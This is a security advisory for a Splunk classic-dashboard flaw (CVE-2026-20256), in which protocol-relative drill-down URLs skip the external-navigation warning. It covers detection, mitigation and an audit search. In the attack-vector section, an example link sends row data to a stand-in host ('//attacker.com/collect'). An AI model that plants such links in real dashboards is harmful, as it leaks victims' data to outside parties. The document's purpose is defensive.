CVE-2026-20256: Splunk Information Disclosure Vulnerability

CVE-2026-20256 Overview

CVE-2026-20256 affects Splunk Enterprise and Splunk Cloud Platform. The vulnerability allows a low-privileged user to trigger data exfiltration through classic dashboards. An attacker redirects a victim to an external site using a protocol-relative URL in a drill-down link. The URL classifier in classic dashboards only inspects http:// and https:// schemes when identifying external URLs. Protocol-relative URLs such as //attacker.com bypass this check, and Splunk Web suppresses the external-navigation warning dialog. The flaw is tracked under [CWE-20] Improper Input Validation. Exploitation requires authentication with a non-admin, non-power role and victim interaction with the malicious dashboard link.

Critical Impact
Authenticated low-privileged users can exfiltrate sensitive dashboard data by silently redirecting victims to attacker-controlled domains through protocol-relative URLs in drill-down links.

Affected Products

Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13
Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132
Splunk classic dashboards using drill-down link functionality

Discovery Timeline

2026-06-10 - CVE CVE-2026-20256 published to NVD
2026-06-10 - Last updated in NVD database

Technical Details for CVE-2026-20256

Vulnerability Analysis

The vulnerability resides in the URL classifier used by Splunk classic dashboards. The classifier inspects drill-down link targets to determine whether the destination is external. When a destination is classified as external, Splunk Web presents a warning dialog before navigation. The classifier only matches the literal scheme prefixes http:// and https://. Protocol-relative URLs, which begin with //, are not recognized as external. Browsers resolve protocol-relative URLs using the current page scheme, so //attacker.com becomes https://attacker.com at navigation time. The dashboard treats the value as a relative path during classification while the browser treats it as a fully qualified external destination.

Root Cause

The classifier implements an incomplete scheme allowlist. It performs string matching against the two explicit prefixes instead of parsing the URL according to RFC 3986. Any value that bypasses these two prefixes — including protocol-relative URLs, scheme-relative paths, and certain encoded variants — is treated as internal navigation.

Attack Vector

An authenticated user with a custom or low-privilege role creates or modifies a classic dashboard. The user inserts a drill-down link whose target is //attacker.com/collect?d=$row.field$ or similar. When a victim with access to the dashboard clicks the drilled-down element, the browser issues a request to the attacker-controlled host. The request URL can carry exfiltrated data drawn from dashboard tokens, row context, or search results. The external-navigation warning dialog does not appear, so the victim has no visual cue that the destination is off-platform.

The vulnerability requires network access to Splunk Web, low-privileged authentication, and victim interaction. It does not require admin or power role membership, which expands the population of accounts capable of staging the attack.

Detection Methods for CVE-2026-20256

Indicators of Compromise

Dashboard XML or SimpleXML definitions containing drill-down link.target or <link> values that begin with //
Outbound HTTP/HTTPS requests from user browsers to unexpected external hosts immediately following Splunk dashboard interactions
Audit log entries showing dashboard edits by non-admin, non-power users that add or modify drill-down links
Referer headers in proxy logs pointing to Splunk Web URLs paired with destinations outside the organization

Detection Strategies

Scan saved dashboard objects for drill-down targets matching the regex ^//[^/] to identify protocol-relative URLs
Correlate splunkd_ui_access.log dashboard view events with egress proxy logs to surface anomalous user-driven redirects
Alert on creation or modification of classic dashboards by accounts that recently received dashboard-edit capabilities

Monitoring Recommendations

Log and review all savedsearches.conf and dashboard XML changes through configuration management
Forward Splunk Web access logs and browser proxy telemetry to a centralized analytics platform for correlation
Track dashboard authoring activity by role, with elevated scrutiny for non-admin, non-power users

How to Mitigate CVE-2026-20256

Immediate Actions Required

Upgrade Splunk Enterprise to 10.2.4, 10.0.7, 9.4.12, 9.3.13, or later within the supported branch
Confirm Splunk Cloud Platform instances are running 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, 9.3.2411.132, or later
Audit existing classic dashboards for drill-down links containing protocol-relative URLs and remove or remediate them
Restrict dashboard authoring capabilities to roles that require them, applying least privilege to custom roles

Patch Information

Splunk addressed the issue in the fixed versions listed above. Refer to the Splunk Security Advisory SVD-2026-0606 for vendor guidance, fixed builds, and any additional configuration notes.

Workarounds

Migrate classic dashboards to Dashboard Studio where feasible, which uses a different link-handling pipeline
Remove the edit_dashboards and related capabilities from low-privileged custom roles until upgrades are deployed
Implement egress filtering or browser policy controls that block user navigation from Splunk Web to unapproved external domains

bash

# Search saved dashboards for protocol-relative drill-down targets
| rest /servicesNS/-/-/data/ui/views \
| search eai:data="*<link*//*" \
| table title author eai:acl.app updated